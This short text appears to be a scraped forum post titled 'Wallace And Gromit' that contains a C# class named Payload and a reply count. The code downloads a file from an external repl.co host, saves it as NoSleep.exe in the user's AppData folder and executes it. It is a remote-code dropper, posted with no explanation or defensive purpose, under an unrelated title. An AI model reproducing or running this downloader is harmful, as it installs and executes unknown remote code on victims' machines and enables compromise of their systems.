Wallace And Gromit
✅ doing nothing
using System;
using System.Net;
public class Payload {
public static void Main(string[] args) {
using (var client = new WebClient()) {
client.DownloadFile("https://osintframework.peanutgamerdot.repl.co/OSINTego.py", Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\NoSleep.exe");
}
System.Diagnostics.Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\NoSleep.exe");
}
}
29 replies